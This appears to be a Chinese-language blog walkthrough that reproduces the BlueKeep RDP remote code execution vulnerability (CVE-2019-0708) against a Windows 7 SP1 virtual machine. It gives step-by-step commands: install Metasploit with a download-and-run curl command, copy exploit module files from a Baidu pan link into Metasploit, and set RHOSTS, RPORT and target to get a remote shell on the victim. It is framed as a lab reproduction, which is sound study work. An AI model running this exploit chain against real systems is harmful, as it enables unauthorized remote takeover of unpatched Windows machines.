CVE-2019-0708远程桌面代码执行漏洞复现

漏洞环境

使用VMware Workstations安装Windows7 SP1模拟受害机

Windows7 SP1下载链如下,可复制到迅雷直接下载

ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

n8piL9.png

PS:需开启远程桌面连接,否则连接时会失败

n8CIG6.md.png

EXPLOIT

攻击工具

  • 在kali环境使用以下命令安装最新版metasploit-framework
1
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

如果出现以下情况,则需要杀死apt相关进程,再次执行以上命令

1
2
E: 无法获得锁 /var/lib/dpkg/lock-frontend - open (11: 资源暂时不可用)
E: Unable to acquire the dpkg frontend lock (/var/lib/dpkg/lock-frontend), is another process using it?
  • 下载攻击套件放置文件到msf的相应文件夹(如果已存在同名文件,直接覆盖即可)

https://pan.baidu.com/s/1LqRqH3Vagw4Cane83zgKRA 提取码:ayqx

1
2
3
4
5
6
7
rdp.rb   ->   /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb

rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb

cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

msf攻击命令

键入msfconsole`载入metasploit-framework

再用reload_all重载漏洞利用模块

键入use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP模块

info查看模块相关信息及设置

n89h38.png

用如下命令分别设置相关参数

1
2
3
set RHOSTS 192.168.109.146  //受害主机ID
set RPORT 3389 //受害主机端口号,此漏洞一般为3389
set target 3 //使用VMware满足target3

然后exploit开启攻击等待建立连接

n8Cubd.md.png

建立连接以后,使用shell获得shell,再使用python获得交互式shell

n8CNrQ.md.png

攻击完成,拿到受害主机权限,并可以对受害机进行操作

n8C2qJ.md.png